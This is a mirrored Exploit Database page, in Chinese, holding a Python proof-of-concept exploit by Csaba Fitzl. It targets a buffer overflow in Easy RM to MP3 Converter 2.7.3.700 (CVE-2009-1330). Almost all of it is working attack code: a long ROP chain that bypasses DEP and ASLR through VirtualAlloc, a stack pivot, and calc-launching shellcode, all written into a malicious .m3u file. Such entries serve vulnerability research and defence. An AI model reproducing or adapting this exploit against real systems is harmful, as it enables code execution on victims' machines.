Easy RM to MP3 Converter 2.7.3.700 – ‘.m3u’ File (Universal ASLR + DEP Bypass)

• Exploit Database
• 118 阅读

• 作者： Fitzl Csaba
  日期： 2016-06-13
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39933/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193

  # Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass # Date: 2016-06-12 # Exploit Author: Csaba Fitzl # Vendor Homepage: N/A # Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe # Version: 2.7.3.700 # Tested on: Windows 7 x64 # CVE : CVE-2009-1330   import struct   def create_rop_chain():   # rop chain generated with mona.py - www.corelan.be # added missing parts, and some optimisation by Csaba Fitzl rop_gadgets = [   #mov 1000 to EDX - Csaba 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x10025a1c,# XOR EDX,EDX # RETN 0x1002bc3d,# MOV EAX,411 # RETN 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc4c,# ADD EAX,100 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc24,# ADD EAX,80 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1002dc41,# ADD EAX,40 # POP EBP # RETN 0x41414141,# Filler (compensate) 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x1001d2ac,# ADD EAX,4 # RETN 0x10023327,# INC EAX # RETN 0x10023327,# INC EAX # RETN 0x10023327,# INC EAX # RETN # AT this point EAX = 0x1000 0x1001a788,# PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI 0x41414141,# Filler (compensate) 0x10026d56,# POP EAX # RETN [MSRMfilter03.dll] 0x10032078,# ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] 0x1002e0c8,# MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] 0x1001a788,# PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x10027c5a,# POP EBP # RETN [MSRMfilter03.dll] 0x1001b058,# & push esp # ret[MSRMfilter03.dll] 0x1002b93e,# POP EAX # RETN [MSRMfilter03.dll] 0xfffffffb,# put delta into eax (-> put 0x00000001 into ebx) 0x1001d2ac,# ADD EAX,4 # RETN 0x10023327,# INC EAX # RETN 0x10023327,# INC EAX # RETN 0x1001bdee,# PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate)   0x10029f74,# POP ECX # RETN [MSRMfilter03.dll] 0xffffffff,# 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e,# INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002bc6a,# POP EDI # RETN [MSRMfilter03.dll] 0x1001c121,# RETN (ROP NOP) [MSRMfilter03.dll] 0x10026f2b,# POP EAX # RETN [MSRMfilter03.dll] 0x10024004, #address to xor, it will point to the DLL&apos;s data section which is writeable. Also will work as NOP 0x1002bc07# PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL   ] return &apos;&apos;.join(struct.pack(&apos;<I&apos;, _) for _ in rop_gadgets)   buffersize = 26090   junk = "A" * buffersize   eip = &apos;\x85\x22\x01\x10&apos; # {pivot 8 / 0x08} :# ADD ESP,8 # RETN   rop = create_rop_chain()   calc = ( "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64" "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B" "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20" "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07" "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74" "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")   shell = "\x90"*0x10 + calc   exploit = junk + eip + rop + shell + &apos;C&apos; * (1000-len(rop)-len(shell))   filename = "list.m3u" textfile = open(filename , &apos;w&apos;) textfile.write(exploit) textfile.close()